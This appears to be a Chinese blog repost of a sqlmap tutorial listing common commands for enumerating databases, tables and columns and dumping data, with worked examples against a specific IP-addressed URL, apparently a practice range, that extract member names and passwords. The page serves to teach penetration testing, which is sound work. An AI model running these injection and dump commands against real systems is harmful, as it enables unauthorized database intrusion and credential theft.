当前位置:网站首页>sqlmap注入教程 常用指令
sqlmap注入教程 常用指令
2022-07-31 05:10:00 【不习惯有你】
sqlmap 官网:sqlmap: automatic SQL injection and database takeover tool
sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage
–hh 帮助手册 详细重点部分
sqlmap.py -u “注入地址” --dbs // 列举数据库
sqlmap.py -u “注入地址” --current-db // 当前数据库
sqlmap.py -u “注入地址” --users // 列数据库用户
sqlmap.py -u “注入地址” --current–user // 当前用户
sqlmap.py -u “注入地址” --tables -D “数据库” // 列举数据库的表名
sqlmap.py -u “注入地址” --columns -T “表名” -D “数据库” // 获取表的列名
sqlmap.py -u “注入地址” --dump -C “列名字” -T “表名字” -D “数据库” //获取数据库下表的列信息最好在指令后面加 --level 3 --risk2,可以提升扫描时的深度于速率
--delay=1 指的是一秒钟发一个包
例如:
sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” --dbs //爆库
sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” -D stormgroup --tables //爆表
sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” -D stormgroup -T member --columns 爆列
sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” -D stormgroup -T member -C name,password --dump 爆字段值
尊重原创:
装载于:https://www.csdn.net/tags/NtjaAgzsNDk2NTMtYmxvZwO0O0OO0O0O.html
边栏推荐
- Object Detection Study Notes
- leetcode-每日一题873. 最长的斐波那契子序列的长度(哈希和二分)
- 12 【网页布局总结 元素的显示与隐藏】
- C语言实验五 循环结构程序设计(二)
- 基于web3.0使用钱包Metamask的三方登陆
- 剑指offer专项突击版 ---- 第1天
- Flink sink redis writes to Redis
- vulhub靶场学习日记hackme2
- leetcode-每日一题745. 前缀和后缀搜索(哈希和字典树)
- The interviewer asked me TCP three handshake and four wave, I really
猜你喜欢

实验7 UDP与TCP对比

数据库学习笔记

闭包(五)----一个常见的循环

leetcode-每日一题1252. 奇数值单元格的数目(模拟优化)

Distributed Transactions - Introduction to Distributed Transactions, Distributed Transaction Framework Seata (AT Mode, Tcc Mode, Tcc Vs AT), Distributed Transactions - MQ

leetcode-每日一题731. 我的日程安排表 II

vulhub靶场学习日记hackme1

剑指offer基础版 ---- 第27天

第7章 网络层第2次练习题答案(第三版)

Swordsman Offer Special Assault Edition --- Day 3
随机推荐
“档次法”——用于物品体积分布不均匀的01背包问题的求解方法
剑指offer专项突击版 ---- 第2天
Redis first meeting
uni-app进阶之样式框架/生产环境【day10】
leetcode-每日一题735. 行星碰撞(栈模拟)
[Introduction to MySQL 8 to Mastery] Basics - silent installation of MySQL on Linux system, cross-version upgrade
PHP中abstract(抽象)、final(最终)和static(静态)原理与用法
基于flask的三方登陆的流程
Redis:安装使用
Three handshakes and four waves
10 【组件编码流程 组件自定义事件 全局事件总线】
实验7 UDP与TCP对比
leetcode-每日一题745. 前缀和后缀搜索(哈希和字典树)
梳理一下自己常用的快捷键
10 【高度塌陷与BFC】
数据集划分以及交叉验证法
The interviewer asked me how to divide the database and the table?Fortunately, I summed up a set of eight-part essays
C语言实验四 循环结构程序设计(一)
The interviewer asked me TCP three handshake and four wave, I really
Proteus 8 Professional安装教程